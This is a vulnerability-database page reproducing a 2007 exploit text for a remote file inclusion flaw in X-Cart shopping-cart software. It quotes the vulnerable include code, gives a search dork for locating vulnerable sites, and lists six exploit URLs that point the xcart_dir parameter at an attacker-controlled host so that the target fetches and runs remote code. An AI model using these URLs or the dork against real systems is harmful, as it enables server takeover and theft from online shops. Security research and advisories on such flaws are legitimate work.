Lucene search

xcart-rfi.txt

🗓️ 11 Sep 2007 00:00:00Reported by aLiiFType

packetstorm🔗 packetstormsecurity.com👁 69 Views

xCart Remote file inclusion vulnerability. Exploit allows remote attackers to include and execute arbitrary files via xcart-path/config.php, xcart-path/prepare.php, xcart-path/smarty.php, xcart-path/customer/product.php, xcart-path/provider/auth.php, or xcart-path/admin/auth.php

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`## xCart Remote file inclusion ##  
  
## Download script : http://www.x-cart.com//  
  
## Discovered By : aLiiF a.k.a [arif] @debuteam 07/09/2007  
  
## HomePage : http://www.debuteam.net//  
  
## Thx to : Debu Newbie Payment Yogac nyubi Rozi ^S0n_g0ku^  
Kuris Sonix Toxicity newbi3 R4yn4ld0 DisJocKey  
s3ng0k home_edition Holong home_edition2001  
th0nk Scr3W_W0rm jayoes and aLL @Debutem @Mildnet  
  
  
  
########### ###########  
## ##  
## 333 444555 HH HH KK K ##  
## 333 3332222 444 555 1133311 HH HH KK K ##  
## 333 33322222 444 55 11 11 HH HH #### 00000 KKKK ##  
## 333 333 22 444 55 11 11 HHaaHH ## 00 KKK ##  
## 333 333 22 444 55 11 11 HH HH ##### 00 KKKK ##  
## 333 333 22 444 555 11 11 HH HH # ## 00 KK K ##  
## 333 333 22 444555 1133311 HH HH ##### 00000 KK K ##  
## ##  
########## ##########  
  
  
  
/*****************************************************************************\  
+-----------------------------------------------------------------------------+  
| X-Cart |  
| Copyright (c) 2001-2004 Ruslan R. Fazliev <[email protected]> |  
| All rights reserved. |  
+-----------------------------------------------------------------------------+  
#  
# $Id: config.php,v 1.297.2.9 2004/02/05 12:25:43 mclap Exp $  
#  
# Global definitions & common functions  
#  
  
@include $xcart_dir."/prepare.php";  
  
#  
# Create Smarty object  
#  
if (!@include $xcart_dir."/smarty.php") {  
  
  
#################################################################################  
  
  
## Dork : "X-CART. Powerful PHP shopping cart software" ##  
## ##  
  
  
=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=  
  
  
## http://www.target.com/[xcart-path]/config.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/prepare.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/smarty.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/customer/product.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/provider/auth.php?xcart_dir=http://urhost/[inject]?  
## http://www.target.com/[xcart-path]/admin/auth.php?xcart_dir=http://urhost/[inject]?  
  
===================================================================  
  
  
## Contack person : [email protected]  
  
## ViVa Debuteam !!!   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

11 Sep 2007 00:00Current

7.4High risk

Vulners AI Score7.4